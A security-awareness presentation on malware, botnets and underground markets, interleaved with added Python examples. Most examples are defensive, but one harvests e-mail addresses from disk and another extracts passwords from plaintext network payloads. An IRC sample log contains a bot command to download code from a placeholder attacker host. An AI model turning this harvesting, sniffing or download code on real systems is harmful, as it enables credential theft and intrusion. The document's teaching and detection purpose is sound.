Intro to COBIT, Part 1: Threat Landscape
Presented by George Grachis, CISSP
Current Trends
UCLA Database Hacked
Hacker attack at UCLA affects 800,000 people
POSTED: 2:50 p.m. EST, December 12, 2006
• UCLA says hacker invaded database for more than a year
• Info exposed on about 800,000 students, faculty, staff
• Data included Social Security numbers, birth dates, addresses
• UCLA: No evidence any data have been misused
Malware Defined
What is malicious code?
As the name implies, it is software designed and developed with malicious intent. This includes gaining unauthorized access, network vandalism, theft of data or services, and destruction of software, data, or systems. We classify malicious code as:
• Trojan Horses
• Worms
• Viruses
Trojan Horses
A Trojan horse is a generic term for a computer program that contains an apparent or actual useful function but also contains additional (hidden) functions that allow unauthorized collection, falsification, or destruction of data.
Viruses
A virus is a program that "infects" other programs by modifying them to include a copy of itself.
A virus must have two functional elements:
• A search routine to locate new files or areas to infect, and
• A copy routine so it can replicate itself into the file or area located by the search routine.
This is what distinguishes a virus from other forms of malicious code.
Worms
Worms are similar to viruses, but replicate in their entirety, creating exact copies of themselves, without needing a "carrier" program. Worms are normally found on computer networks and multi-user computers, and use inter-computer or inter-user communications (E-mail) as the transmission medium.
How does malicious code initially get in to a computer?
Malicious code can invade a system through any of the normal means we use to communicate, transfer, or share software and data.
This includes:
• Diskettes, tapes, CD-ROMs, and any other portable media
• Communications systems and services
Infections also occur from the use of new diskettes, new (shrink-wrapped) software, and new computer systems.
The primary means of infection today is receiving infected files as e-mail attachments.
Propagation via e-mail
Built-in SMTP engines in malicious code allow the infected system to send infected e-mail without the owner's knowledge.
The code searches files with extensions adb, asp, dbx, doc, eml, htm, html, msg, oft, php, pl, rtf, sht, tbb, txt, uin, vbs, wab and others for e-mail addresses to which it sends infected e-mail.
The Subject and Body are designed to entice a person to open and read the e-mail and its attachment.
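The harvesting step described above is mechanically simple, and seeing it laid out explains both why those extensions are targeted and how a defender can catch it. The following is an added example, not code from the presentation: it walks a directory tree, reads only files whose extension is on the slide's list, and pulls addresses out of them with a crude regular expression, which is all a mass-mailer needs. The directory tree and file contents are constructed for the demo; the helper names are my own.

```python
import os
import re
import tempfile
from typing import Set

# Extensions the slide lists as harvest targets for mass-mailing malware.
HARVEST_EXTENSIONS = {
    "adb", "asp", "dbx", "doc", "eml", "htm", "html", "msg", "oft", "php",
    "pl", "rtf", "sht", "tbb", "txt", "uin", "vbs", "wab",
}

# Deliberately simple address pattern; real harvesters are just as crude,
# which is why they also pick up addresses inside HTML and binary mailboxes.
EMAIL_RE = re.compile(rb"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def harvest_addresses(root: str) -> Set[str]:
    """Walk `root` and collect every e-mail address found in files whose
    extension is on the harvest list. Files are read as bytes so binary
    formats such as .dbx or .wab mailboxes are scanned as well as text."""
    found = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
            if ext not in HARVEST_EXTENSIONS:
                continue
            with open(os.path.join(dirpath, name), "rb") as fh:
                for match in EMAIL_RE.findall(fh.read()):
                    found.add(match.decode("ascii", "replace").lower())
    return found


def build_sample_tree() -> str:
    """Create a constructed directory tree (not real user data) that mimics
    what a harvester would see on a victim workstation."""
    root = tempfile.mkdtemp(prefix="harvest_demo_")
    samples = {
        "notes.txt": b"Call alice@example.org about the audit.\n",
        # A fake Windows Address Book: binary junk around an address.
        "contacts.wab": b"\x00\x01BOB\x00bob.smith@example.net\x00\xff",
        "index.html": b'<a href="mailto:carol@example.com">Carol</a>',
        # .pdf is not on the list, so this address must NOT be harvested.
        "report.pdf": b"dave@example.org should not be harvested (.pdf)",
        # Same address as notes.txt in different case: deduplicated.
        "script.vbs": b"' Alice again: ALICE@example.org",
    }
    for name, data in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for addr in sorted(harvest_addresses(build_sample_tree())):
        print(addr)
```

A practical check that follows directly from this: plant a unique address that is used nowhere else in a .txt or address-book file on a few workstations. Any message ever sent to that address is evidence that something harvested the disk, regardless of whether antivirus recognised the sample.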
How does malicious code spread?
Sharing software through the use of media and transferring files across networks (including the Internet) are the most common ways of spreading malicious code.
A virus or worm on an infected system will also propagate through network shares by dropping copies of itself into, or infecting, shared folders.
How is malicious code activated?
Malicious code is only activated if it is executed.
In the case of infected .COM, .EXE, and .SYS files it is easy to see how they are executed.
Boot sectors and master boot records are "executed" when the computer attempts to boot from a floppy diskette or hard drive.
.DOC, .XLS, and other MS Office files aren't "executed" in a strict sense. The macros that are part of the file ARE executed, and this is where the virus resides.
Design flaws in application software can cause it to automatically execute e-mail attachments.
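Because the executable part of an Office document is the embedded VBA project rather than the file itself, a mail gateway or triage script should decide on content, not on the extension. The following is an added example (not from the presentation) that flags documents carrying a VBA project in both container formats: the legacy OLE compound file the slide refers to as .DOC/.XLS, and the zip-based OOXML format. It is a heuristic: for the OLE case it scans the raw bytes for the UTF-16LE name of the `_VBA_PROJECT` stream instead of parsing the compound-file directory, which is what a production tool such as olevba does. The sample files are constructed stand-ins with real magic numbers and fake bodies; the function names are mine.

```python
import io
import zipfile

# Magic numbers for the two Office container formats.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc/.xls/.ppt (compound file)
ZIP_MAGIC = b"PK\x03\x04"                         # OOXML .docx/.docm/.xlsx/.xlsm (zip)

# In a compound file, directory entry names are stored as UTF-16LE. The
# "_VBA_PROJECT" stream only exists when a VBA project is embedded, so its
# encoded name is a usable (if crude) indicator. Assumption: scanning raw
# bytes instead of parsing the directory, which a real tool must do.
VBA_MARKER = "_VBA_PROJECT".encode("utf-16-le")


def _ooxml_names(data: bytes):
    """Return the member list if `data` is an OOXML package, else None."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        return None
    return names if "[Content_Types].xml" in names else None


def office_file_has_macros(data: bytes) -> bool:
    """True when an Office document carries a VBA project."""
    if data.startswith(OLE_MAGIC):
        return VBA_MARKER in data
    names = _ooxml_names(data) if data.startswith(ZIP_MAGIC) else None
    if names is not None:
        # The VBA project is always stored as a vbaProject.bin part.
        return any(n.lower().endswith("vbaproject.bin") for n in names)
    return False


def classify_attachment(data: bytes) -> str:
    """Triage verdict based on content, ignoring the claimed extension."""
    is_office = data.startswith(OLE_MAGIC) or (
        data.startswith(ZIP_MAGIC) and _ooxml_names(data) is not None
    )
    if not is_office:
        return "not-office"
    return "macro-enabled" if office_file_has_macros(data) else "no-macros"


def make_ooxml(with_macros: bool) -> bytes:
    """Build a minimal constructed OOXML container (not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            zf.writestr("word/vbaProject.bin", b"\x01\x16\x01\x00")
    return buf.getvalue()


# Constructed stand-ins for legacy binary documents: real magic, fake body.
SAMPLE_OLE_WITH_VBA = OLE_MAGIC + b"\x00" * 64 + VBA_MARKER + b"\x00" * 64
SAMPLE_OLE_PLAIN = OLE_MAGIC + b"\x00" * 64 + "WordDocument".encode("utf-16-le")


if __name__ == "__main__":
    for label, blob in (("docm", make_ooxml(True)), ("docx", make_ooxml(False)),
                        ("doc+vba", SAMPLE_OLE_WITH_VBA), ("doc", SAMPLE_OLE_PLAIN),
                        ("exe", b"MZ\x90\x00")):
        print(label, classify_attachment(blob))
```

Note that a file arriving as `invoice.doc` can be an OOXML zip and vice versa; Office opens it according to its content, which is exactly why the check above never looks at the filename.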
How can malicious code impact a system?
• Retrieve cached passwords / data files (e.g. theft of sensitive / privacy-related information)
• Download and execute a file (typically to install a backdoor)
• Keystroke logging (e.g. theft of sensitive / privacy-related information)
• Delete files / format hard drive
• Copy files (usually copies of itself for reactivation)
• Write to files (e.g. data corruption) / registry (e.g. to control the infected system)
• Terminate processes (typically antivirus and firewall software)
• Open port(s) on the victim's computer, connect to a backdoor web server and achieve a level of control over the infected computer
What are the symptoms and indications of an infection?
What do you look for?
Note abnormal or unexpected activity such as:
• Displays, music, or other sounds
• Slowdown in processing speed
• Unusual disk activity
• Strange error messages
• Unexpected or unexplained changes in file sizes
• Loss of programs or data
These symptoms don't necessarily mean you are infected, only that you MIGHT be infected
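"Unexpected changes in file sizes" is the one symptom in the list above that can be turned into a precise check rather than a hunch: record the size and hash of every executable while the system is known-good, and diff against that baseline later. The following is an added example, not from the presentation, of that file-integrity check. The directory, the "infection" (appending bytes to one program and dropping a new one, no actual malicious code) and the function names are all constructed for the demo.

```python
import hashlib
import os
import tempfile

EXECUTABLE_EXTS = (".exe", ".com", ".sys", ".dll")


def snapshot(root: str) -> dict:
    """Record size and SHA-256 of every executable under `root`, keyed by
    path relative to root. Size is the symptom the slide names; the hash
    also catches infectors that overwrite bytes without changing the size."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXECUTABLE_EXTS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            baseline[rel] = {"size": len(data),
                             "sha256": hashlib.sha256(data).hexdigest()}
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Diff two snapshots into modified / added / missing path lists."""
    return {
        "modified": sorted(p for p in baseline
                           if p in current and baseline[p] != current[p]),
        "added": sorted(set(current) - set(baseline)),
        "missing": sorted(set(baseline) - set(current)),
    }


def demo() -> dict:
    """Constructed scenario: take a baseline, simulate what an appending
    file infector and a dropper leave behind, then diff."""
    root = tempfile.mkdtemp(prefix="fim_demo_")
    os.makedirs(os.path.join(root, "bin"))
    files = {
        "app.exe": b"MZ" + b"\x00" * 200,
        "bin/tool.com": b"\xb8\x00\x4c\xcd\x21",
        "readme.txt": b"docs",          # not an executable: not tracked
    }
    for rel, data in files.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)
    baseline = snapshot(root)

    # Simulated infection: an appender grows app.exe, a dropper writes a
    # new executable, and readme.txt changes but is outside the baseline.
    with open(os.path.join(root, "app.exe"), "ab") as fh:
        fh.write(b"\x90" * 512)
    with open(os.path.join(root, "bin", "svch0st.exe"), "wb") as fh:
        fh.write(b"MZ" + b"\x00" * 10)
    with open(os.path.join(root, "readme.txt"), "ab") as fh:
        fh.write(b" edited")

    return compare(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

The baseline is only as trustworthy as its storage: keep it on read-only or offline media, since malware that can patch `app.exe` can also rewrite a baseline sitting next to it. Tools such as Tripwire and AIDE implement this same idea with signed databases.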
Organized Crime
Malicious code authors have formed groups and associations to facilitate the proliferation and development of their wares.
Groups have appeared in most countries around the world, some of them even have an international constituency.
The following slide gives some idea of the malicious code authoring groups that are or have been in existence.
Malicious Code Authoring Groups
29A (Spain)
Australian Institute of Hackers (Australia)
Alliance (International)
A New Order of Intelligence (Sweden)
Corea Virus Club (Korea)
Digital Anarchy (Argentina)
Diabolical Kreations (Paraguay)
Death Virii Crew (Russia)
No Mercy (Indonesia)
Phalcon-Skism (USA/Canada)
TridenT (Netherlands)
Taiwan Power Virus Organization (Taiwan)
Youths Against McAfee (USA)
and dozens more...
Newsletters & e-Zines
29A, 40 Hex, Anaconda, ARCV Newsletter, AVCR Journal, Censor, Chaos AD, Chiba City Times, CPI Newsletter, Crypt Newsletter, Evolution, God@rky's V.H.N., Immortal, EAS Virus Magazine, Infected Moscow, Infected Voice, Infectious Disease Magazine, Insane Reality Magazine, Minotauro Magazine, Nemesis, Source Of Kaos, and many more...
Malicious code authors and groups have also prepared and developed tutorials covering virtually all aspects of malicious code development.
The tutorials are also freely available on the Internet. The following slide shows just a sampling of some of the tutorials available.
Tutorials
The Virus Writer's Handbook (Terminator Z)
Virus Infection Tutorial 0.3 (Pocket)
Batch Viruses by Wavefunc
Macro Virus Tutorial (Dark Night)
Mutation Engines (JHB)
Guide to improving Polymorphic Engines (Rogue Warrior)
Argument for slow infection and slow polymorphism (Rogue Warrior)
Infection on Compression (MGL/SVL)
The SFT stealth tutorial (MGL/SVL)
Self Checking Executable Files (Demogorgon)
Upper Memory Residency (IntrusO)
Interleaved Encryption Technique (Stomach Contents)
and many, many more...
Malware Applications
Why are there so many viruses, trojan horses, and worms?
The availability of source code is a main factor in their proliferation.
Many malicious code authors make their source code freely available through the Internet and electronic chat rooms.
Bots
The word bot is an abbreviation of robot. Robots are frequently used in the Internet world.
Spiders used by search engines to map websites, and software responding to requests on IRC (such as eggdrop), are robots.
IRC and BOTS
IRC stands for Internet Relay Chat. It is a protocol designed for real-time chat communication (see RFC 1459, updated by RFCs 2810, 2811, 2812 and 2813), based on a client-server architecture.
Most IRC servers allow free access for everyone.
Bots
An IRC server connects to other IRC servers within the same network.
IRC users can communicate both in public on channels and in private (one to one). There are two basic levels of access to IRC channels: users and operators. A user who creates a channel becomes its operator.
An operator has more privileges than a regular user.
Bots
IRC bots are treated no differently than regular users (or operators).
Control over these bots is usually based on sending commands to a channel set up by the attacker and infested with bots.
An important feature of such bots is that they are able to spread rapidly to other computers.
Many zombie (bot-infected computer) networks have been controlled with proprietary tools developed by the crackers themselves.
IRC is considered the best way to launch attacks because it's flexible, easy to use, and public servers are readily available.
IRC offers a simple method to control hundreds or even thousands of bots at once in a flexible manner.
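The control channel described above is visible to anyone who can read the IRC traffic or the server log, because IRC is a plain-text line protocol. The following is an added example, not part of the presentation, of what a detection engineer would write against it: a parser for the RFC 1459 message format the slide cites (optional `:prefix`, command, parameters, optional `:trailing` argument) and a heuristic that flags channels where many clients join but effectively a single nick talks, and what it says looks like commands rather than conversation. The log lines are constructed; the assumption that bot commands start with `.` or `!` is a heuristic of mine, not a property of any particular bot family, and the function names are mine.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class IrcMessage:
    prefix: Optional[str]
    command: str
    params: List[str]

    @property
    def nick(self) -> Optional[str]:
        # Client-originated messages carry "nick!user@host" as the prefix.
        return self.prefix.split("!", 1)[0] if self.prefix else None


def parse_irc_line(line: str) -> IrcMessage:
    """Parse one raw line per RFC 1459 section 2.3.1:
    [':' prefix SPACE] command {SPACE middle} [SPACE ':' trailing]
    The trailing parameter is the only one allowed to contain spaces."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    middle, sep, trailing = line.partition(" :")
    parts = middle.split()
    params = parts[1:]
    if sep:
        params.append(trailing)
    return IrcMessage(prefix, parts[0].upper(), params)


# Assumption (heuristic): bot herders commonly prefix commands with "." or "!".
COMMAND_PREFIXES = (".", "!")


def find_c2_channels(lines: List[str], min_members: int = 4) -> Dict[str, dict]:
    """Flag channels with many joiners, exactly one speaker, and only
    command-looking messages. Returns channel -> {controller, bots, commands}."""
    members = defaultdict(set)
    talk = defaultdict(list)          # channel -> [(nick, text)]
    for raw in lines:
        msg = parse_irc_line(raw)
        if msg.command == "JOIN" and msg.params:
            members[msg.params[0]].add(msg.nick)
        elif (msg.command == "PRIVMSG" and len(msg.params) == 2
              and msg.params[0].startswith("#")):
            talk[msg.params[0]].append((msg.nick, msg.params[1]))

    flagged = {}
    for chan, joined in members.items():
        said = talk.get(chan, [])
        if len(joined) < min_members or not said:
            continue
        speakers = {n for n, _ in said}
        command_like = sum(1 for _, t in said if t.startswith(COMMAND_PREFIXES))
        if len(speakers) == 1 and command_like == len(said):
            controller = next(iter(speakers))
            flagged[chan] = {"controller": controller,
                             "bots": sorted(joined - {controller}),
                             "commands": [t for _, t in said]}
    return flagged


# Constructed server-side log (not a real capture): one bot channel and one
# ordinary channel, plus a numeric reply and a PING to exercise the parser.
SAMPLE_LOG = [
    ":irc.example 001 bot0a1f :Welcome to the network",
    ":bot0a1f!x@10.0.0.5 JOIN #upd8",
    ":bot77c2!x@10.0.0.9 JOIN #upd8",
    ":bot3e9d!x@192.168.1.20 JOIN :#upd8",   # some servers send the channel as trailing
    ":bot9f00!x@172.16.4.4 JOIN #upd8",
    ":h4x!op@evil.example JOIN #upd8",
    ":h4x!op@evil.example PRIVMSG #upd8 :.download http://evil.example/u.exe 1",
    ":h4x!op@evil.example PRIVMSG #upd8 :.scan 10.0.0.0/8 445",
    ":alice!a@home.example JOIN #linux",
    ":bob!b@work.example JOIN #linux",
    ":alice!a@home.example PRIVMSG #linux :anyone tried the new kernel?",
    ":bob!b@work.example PRIVMSG #linux :yes, works fine here",
    "PING :irc.example",
]


if __name__ == "__main__":
    for chan, report in find_c2_channels(SAMPLE_LOG).items():
        print(chan, report)
```

The same parser works on the client side of a suspected bot: an outbound connection to port 6667 from a workstation that then sits in a channel and never sends a PRIVMSG of its own is worth a look even before any command arrives.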
Sniffing & Key logging
Bots can also be effectively used to enhance the art of sniffing. Observing traffic data can lead to detection of an incredible amount of information. This includes user habits and TCP packet payloads, which could contain interesting information (such as passwords).
The same applies to key logging: capturing all the information typed in by the user (e-mails, passwords, home banking data, PayPal account info, etc.).
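What a sniffing bot actually pulls out of "TCP packet payload" is easy to underestimate until you see how little work it takes. The following is an added example (not from the presentation) that extracts credentials from the client-to-server payload of three protocols that were common and unencrypted in 2006: POP3 and FTP (`USER`/`PASS` lines) and HTTP Basic authentication (a base64 header). The payloads are constructed, not captured; the function names are mine. The TLS flow is included to show the one case where the sniffer gets nothing.

```python
import base64
import re
from typing import List, Tuple

# Constructed client->server payloads (not real captures), keyed by destination port.
SAMPLE_FLOWS = [
    (110, b"USER alice\r\nPASS Winter2006!\r\nSTAT\r\n"),
    (21, b"USER ftpuser\r\nPASS hunter2\r\nPWD\r\n"),
    (80, b"GET /admin HTTP/1.1\r\nHost: intranet.example\r\n"
         b"Authorization: Basic " + base64.b64encode(b"bob:s3cret") + b"\r\n\r\n"),
    # TLS ClientHello: the same kind of login over HTTPS yields nothing readable.
    (443, b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03"),
]

# USER line followed (eventually) by a PASS line; DOTALL lets .*? span lines.
USER_PASS_RE = re.compile(rb"^USER (\S+)\r?$.*?^PASS (\S+)\r?$", re.M | re.S)
BASIC_RE = re.compile(rb"^Authorization: Basic ([A-Za-z0-9+/=]+)\r?$", re.M)


def extract_credentials(dst_port: int, payload: bytes) -> List[Tuple[str, str, str]]:
    """Return (protocol, username, password) triples found in one payload."""
    found = []
    if dst_port in (21, 110):
        proto = "ftp" if dst_port == 21 else "pop3"
        for user, pw in USER_PASS_RE.findall(payload):
            found.append((proto, user.decode(), pw.decode()))
    elif dst_port == 80:
        for token in BASIC_RE.findall(payload):
            try:
                user, _, pw = base64.b64decode(token, validate=True).partition(b":")
                found.append(("http-basic", user.decode(), pw.decode()))
            except (ValueError, UnicodeDecodeError):
                continue   # malformed header: skip rather than crash the sniffer
    return found


def harvest(flows) -> List[Tuple[str, str, str]]:
    """Run extraction over every (port, payload) pair."""
    creds = []
    for port, payload in flows:
        creds.extend(extract_credentials(port, payload))
    return creds


if __name__ == "__main__":
    for proto, user, pw in harvest(SAMPLE_FLOWS):
        print(f"{proto}: {user} / {pw}")
```

The defensive reading is the mirror image: any protocol on which this script succeeds is one a bot on the same network segment, or on the same host, can harvest from, and the fix is transport encryption (TLS) rather than a stronger password.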
Identity Theft
The above mentioned methods allow an attacker controlling a bot-net to collect an incredible amount of personal information.
Such data can then be used to build fake identities, which can in turn be used to obtain access to personal accounts or perform various operations (including other attacks) shifting the blame to someone else.
Hosting of Illegal Software
Last, but not least, bot-compromised computers can be used as a dynamic repository of illegal material (pirated software, pornography, etc.). The data is stored on the disk of an unaware home or business broadband user.
Hours could be spent talking about the possible applications of bot-nets (for example pay per click abuse, phishing, hijacking HTTP/HTTPS connections etc.). Bots alone are only tools, which can easily be adapted to every task which requires a great number of hosts under single control.
Different Types of Bots
Many types of ready–made bots are available for download from the Internet. Each of them has its own special features.
Let's have a look at the most popular bot, outlining its common features and distinctive elements.
Agobot
Agobot is probably one of the most popular bots used by crackers. What is interesting about Agobot is its source code: highly modular, it makes it simple to add new functions.
Agobot provides many mechanisms to hide its presence on the host computer. They include NTFS Alternate Data Streams, an antivirus killer and a polymorphic encryptor engine.
Agobot offers traffic sniffing and sorting functionality. Protocols other than IRC can also be used to control this bot.
Hacker Tools
How easy is it to create a virus using an automated creation tool?
An 8-year-old can do it!
It’s as simple as making a few selections on the menu-driven creation tool. The following slides will take you through the process of using a menu-driven, automated creation tool to create a unique, custom made macro virus.
Software For 2007!
Guide to Hacking 2007 (NEW)
Hacker Training Suite (NEW)
Digital Cable Hacking CD (NEW)
Chat System Hacker '07 (NEW)
The Master Hacker PRO (NEW)
Hackers Tool Chest PRO (NEW)
WiFi Wireless Hacking (NEW)
Internet Spy PRO
Password Stealers '07 CD (NEW)
Smart Guide to Hacking (NEW)
Serials & Reg Keys Expanded Special Edition Hackers (NEW)
Virus & Trojans 2006
Internet Detective 2007 (NEW)
Hardware For 2007!
NEW Handheld Credit Card Reader
SECTION: CREDIT & FINANCES
Identity Fraud Book
Portable Credit & Magnetic Card Reader/Writer
Windows Magnetic Strip Hacking Software
The Ultimate Credit Card Hacking Bible
Blank Magnetic Swipe Cards
Credit Card Hacking Software CD Combo
Why is malicious code successful?
• Lack of training and awareness
• Using out-of-date anti-virus products
• Absence of or inadequate security controls
• Ineffective use of existing security controls
• Bugs and loopholes in system software
• Unauthorized use of software
• Network misuse
What’s Next
Expect to see increased use of social networks that link users. These networks allow people with common personal or professional interests to find each other easily.
The linking of users or networks also gives attackers a method to attack multiple users through one entity or through a web of the network.
As the use of RSS (Really Simple Syndication) becomes more prevalent, today’s software may not handle attacks well.
Frequent updates of RSS, along with the embedding of downloads and encoding through a variety of XML formats, can lead to undetected infections.
As more applications become embedded within browsers (for example, a spreadsheet program that can be loaded within the browser), the web will become more of an application platform, leading to more opportunities for security vulnerabilities and problems.
The use of "underground" business tools will also increase. The types and availability of certain toolkits, such as those for vulnerability testing, will keep improving, which bodes well for both researchers and criminals.
For example, fuzzers are a newer technology that can automatically run a series of tests (millions of tests) against an application, searching for errors in the code.
The blackhat and whitehat markets for zero-day threats will increase, and the number of entities offering “rewards” to researchers who find and report vulnerabilities will likewise also increase.
We will also see increased organization, sharing, trading, and commerce in the underground with regards to zero-day exploit code.
Black Market
• $980 - $4,900: Trojan program to steal online account information
• $490: Credit card with PIN
• $78 - $294: Billing data with SSN and address
• $147: Driver's license
• $147: Birth certificate
• $98: Social Security card
• $6: PayPal account with logon and password
We will see more and more privacy issues connected to the storage of personal, private, and confidential business data on the Internet.
As more people use the Internet, more goods and services transactions will take place over the web: signing up for services and buying goods from web-based businesses, for example.
As this happens, the danger of leaking data increases. For example, many companies offer 2GB of free personal storage space.
End of Part 1